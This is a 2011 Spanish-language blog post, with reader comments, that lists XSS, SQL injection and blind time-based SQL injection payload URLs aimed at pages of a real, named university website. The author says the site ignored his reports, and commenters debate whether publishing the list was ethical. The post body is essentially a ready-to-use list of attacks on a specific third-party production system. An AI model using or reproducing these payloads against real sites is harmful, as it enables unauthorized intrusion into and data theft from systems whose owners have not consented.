domingo, 2 de enero de 2011

www.unmsm.edu.pe - Lista de vulnerabilidades


Vaya, sé que puede parecer redundante, porque ya antes he publicado algunas URLs vulnerables de la web de la universidad, pero encontré unas cuantas más y pensé que sería mejor ponerlas todas juntas en un solo post. Si luego aparecen más URLs vulnerables las añadiré a este post en una actualización pero ya no crearé otro.

Bueno, ahí va la lista.

[XSS]
  1. http://www.unmsm.edu.pe/index.php?url="<script>alert('xss')</script>
  2. http://www.unmsm.edu.pe/index.php?a=buscar&tab="); alert('xss'); //
  3. http://www.unmsm.edu.pe/index.php?a=buscar&s=xss&tot=<script>alert('xss');</script>
  4. http://www.unmsm.edu.pe/index.php?a=buscar&s=<script>alert("xss");</script>

[SQLi]
  1. http://www.unmsm.edu.pe/index.php?id=' and 1=0 union select 1,2,3,4,5,6,7/*
  2. http://www.unmsm.edu.pe/index.php?a=buscar&id=' and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
  3. http://www.unmsm.edu.pe/home.php?id=' and 1=0 union select 1,2,3,4,5,6,7/*
  4. http://www.unmsm.edu.pe/temp.php?id=' and 1=0 union select 1,2,3,'images/escudo_layer.gif',5,6,7,8/*
  5. http://www.unmsm.edu.pe/nts.php?id=' and 1=0 union select 1,2,3,4,5,6/*
  6. http://www.unmsm.edu.pe/archivos_ajax.php?op=noticias&index=' and 1=0 union select 1,2,3,4/*
  7. http://www.unmsm.edu.pe/archivos_ajax.php?op=noticias&anio=' and 1=0 union select 1,2,3,4/*

[Blind SQLi]
  1. http://www.unmsm.edu.pe/index.php?a=mas&tipo=' UNION SELECT IF(1=1,SLEEP(4),1),2,3/*
Nota: Las pruebas se hicieron con Mozilla Firefox 3.6.13 sobre Ubuntu 10.10 Maverick Meerkat.

Saludos.

6 comentarios:

  1. no me parece que publiques los links sin que antes estos hallan sido reportados y corregidos, en el caso de los isql, me parece una irresponsabilidad de tu parte.

    ResponderEliminar
  2. Respeto tu opinion, sin embargo, yo reporte esa lista de vulns a los correos que encontre en la web, lamentablemente nadie responde ni hace nada.

    Un saludo.

    ResponderEliminar
  3. Juan arturo meza castillo2 de septiembre de 2011, 18:42

    Mas alla de ser interezante el tema, donde esta la etica?,
    jaja, osea avisastes que les iban a robar, y como no te hicieron caso,las hicistes de ladron XD.
    Por otro lado cuando tengas algo mas interezante que xss, o inyection sql, pasa la voz. ;)

    ResponderEliminar
  4. La analogía me parece un tanto imprecisa... pero en fin...

    Digamos que la idea era destapar la mugre que esta debajo de la alfombra para que alguien la limpie...

    Por otra parte, Ud. diga en que está interesado, deje su correo y veremos si podemos ayudarle.

    Saludos.

    ResponderEliminar
  5. Si quieres destapar la mugre para es tienes la web de la fisi y las maquinas de los laboratorios que cada día estan peor

    ResponderEliminar
  6. @Anónimo, concuerdo contigo... las máquinas de los laboratorios estan hasta el perno... pero ese es otro tipo de problema, quiza de gestión y ese tipo de cosas... la verdad no me intresa mucho escribir sobre eso aquí xD

    Por lo de la web de la fisi, hace ya tiempo que reporte al encargado muchas vulns en esa web, algunas fueron parchadas y otras no... Además de ello hay que considerar que al estar en un hosting compartido las vulnerabilidades en páginas vecinas tambien le afectan así que es un tema bastante complicadito xD

    Saludos...

    ResponderEliminar